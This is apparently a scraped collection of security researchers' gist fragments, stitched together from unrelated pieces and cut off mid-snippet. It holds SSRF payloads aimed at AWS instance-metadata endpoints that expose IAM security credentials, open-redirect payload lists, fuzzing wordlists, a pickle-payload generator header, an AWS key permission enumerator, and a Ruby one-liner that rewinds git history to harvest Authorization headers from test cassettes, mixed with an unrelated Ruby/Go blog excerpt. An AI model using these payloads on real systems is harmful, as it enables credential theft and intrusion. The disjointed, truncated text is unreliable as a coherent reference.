bl4de

#!/usr/bin/env python

'''
    0xBADCA7

    Vodka goes down the throat better with pickle.
    This script generates pickled object representation. Good for CTFs.
    Params: [1] function, [2] parameter, [3] pickle type

    Sample run:

BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

jstnkndy

.0.0
%00/
.000
.0.0.0
0000
00000
000000
00000000
000000000000.cfg
000000000000-directory~.xml

darkarnium

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.

PaulSec

import subprocess
import argparse
import re
import sys
import requests

def do_dig(domain):
    command = "dig {} | grep IN".format(domain)
    try:
        output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)

jhaddix

.
..
........
@
*
*.*
*.*.*
🐎
0

jobertabma

# VCR cassettes stored in JSON
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq

# VCR cassettes stored in YAML
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq

EdOverflow

/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com

schweigert

I am passionate about Ruby, but its execution time compared to other languages is extremely high, especially when we want to use more complex algorithms. In general, data structures in interpreted languages become incredibly slow compared to compiled languages. Some algorithms such as ´n-body´ and ´fannkuch-redux´ can be up to 30 times slower in Ruby than Go. This is one of the reasons I was interested in embedding Go code in a Ruby environment.

For those who do not know how shared libraries operate, they work in a similar way as DLLs in Windows. However, they have a native code with a direct interface to the C compiler.

Note Windows uses the DLL system, and in this case, this does not necessarily have to be in native code.

One example is DLLs written in C#, which runs on a virtual machine. Because I do not use windows, I ended up not testing if it is poss

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key